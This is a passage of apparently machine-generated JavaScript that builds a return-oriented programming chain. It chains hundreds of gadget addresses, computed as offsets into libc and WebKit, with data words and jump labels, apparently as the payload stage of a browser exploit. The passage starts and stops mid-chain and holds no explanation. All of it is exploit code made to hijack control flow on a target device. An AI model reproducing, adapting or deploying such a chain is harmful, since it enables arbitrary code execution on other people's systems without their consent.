libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+71568, //L139
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+71584, //L140
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+71536, //L137
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+71552, //L138
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L137:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L138:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L139:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L140:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+71680, //L142
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+71664, //L141
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L141:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L142:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L144:
db([65280, 0]); // 0xff00
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+71792, //L145
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L145:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L147:
db([8, 0]); // 0x8
set_gadget(libc_base+763368,); //pop rcx
//L148:
db([8, 0]); // 0x8
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+71976, //L150
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L150:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+72032, //L151
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L151:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+105700, //or rax, rcx
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+72144, //L153
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L153:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L155:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+72264, //L158
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+72248, //L156
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L156:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L158:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+72440, //L161
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+72456, //L162
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+72408, //L159
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+72424, //L160
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L159:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L160:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L161:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L162:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+72552, //L164
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+72536, //L163
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L163:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L164:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L165:
db([24, 0]); // 0x18
set_gadget(libc_base+763368,); //pop rcx
//L166:
db([24, 0]); // 0x18
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+72704, //L168
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L168:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+72760, //L169
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L169:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+105700, //or rax, rcx
libc_base+764760, //pop rsi
ropchain+72896, //L173
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+72880, //L172
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L171:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L172:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L173:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+73016, //L174
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+73048, //L176
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+73032, //L175
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L174:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L175:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L176:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+73152, //L177
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+73168, //L178
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L177:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L178:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+73288, //L179
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+73272, //L180
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L180:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L179:
db([0, 0]); // 0x0
set_gadgets([
libc_base+764760, //pop rsi
ropchain+73376, //L182
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+73360, //L181
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L181:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L182:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+73480, //L183
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+73496, //L184
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L183:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L184:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+73616, //L185
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+73600, //L186
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L186:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L185:
db([0, 0]); // 0x0
//___builtin_bswap64:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+73688, //L188
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L188:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+73752, //L190
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L190:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([16, 0]); // 0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+73832, //L191
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L191:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L193:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+73904, //L194
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L194:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L196:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L197:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L199:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+74040, //L201
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L200:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L201:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+3488438, //mov [rax], ecx
libc_base+764760, //pop rsi
ropchain+74096, //L203
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L203:
db([0, 0]); // 0x0
//L202:
set_gadgets([
libc_base+764760, //pop rsi
ropchain+74144, //L205
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L205:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L207:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+74264, //L210
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+74248, //L208
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L208:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L210:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+74440, //L213
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+74456, //L214
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+74408, //L211
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+74424, //L212
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L211:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L212:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L213:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L214:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+74536, //L215
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+74552, //L216
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L215:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L216:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+74648, //L218
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+74632, //L217
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L217:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L218:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+74728, //L219
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L219:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L220:
db([4, 0]); // 0x4
set_gadget(libc_base+144605,); //pop rdi
//L221:
db([4, 0]); // 0x4
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+74872, //L222
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+74904, //L224
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+74888, //L223
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L222:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L223:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L224:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+5168252, //setl al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+75080, //L226
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+75096, //L227
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+75064, //L225
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L225:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L226:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L227:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+75208, //L229
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+75256, //L232
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+75224, //L230
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L229:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L230:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L231:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L232:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+75368, //L233+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+75360, //L233
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L233:
db([0, 0]); // 0x0
set_gadgets([
ropchain+75384, //L233+24
ropchain+75400, //L228
libc_base+782311, //pop rsp
ropchain+75416, //L234
//L228:
libc_base+782311, //pop rsp
ropchain+86016, //L235
//L234:
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L236:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L238:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+75552, //L241
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+75536, //L239
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L239:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L241:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+75696, //L244
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+75664, //L242
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+75680, //L243
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L242:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L243:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L244:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+75768, //L246
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L246:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+75824, //L247
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L247:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L249:
db([7, 0]); // 0x7
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+75952, //L250
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L250:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L252:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+76072, //L255
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+76056, //L253
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L253:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L255:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+76248, //L258
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+76264, //L259
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+76216, //L256
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+76232, //L257
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L256:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L257:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L258:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L259:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+76376, //L260
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+76408, //L262
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+76392, //L261
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L260:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L261:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L262:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
libc_base+764760, //pop rsi
ropchain+76520, //L263
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+76536, //L264
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L263:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L264:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+76624, //L266
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L266:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+76680, //L267
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L267:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+76824, //L270
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+76840, //L271
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+76808, //L269
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L269:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L270:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L271:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+77000, //L275
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+76968, //L273
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+76984, //L274
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L272:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L273:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L274:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L275:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+77056, //L277
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L277:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+77184, //L279
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+77200, //L280
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+77168, //L278
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L278:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L279:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L280:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+77360, //L284
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+77328, //L282
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+77344, //L283
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L281:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L282:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L283:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L284:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+77416, //L286
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
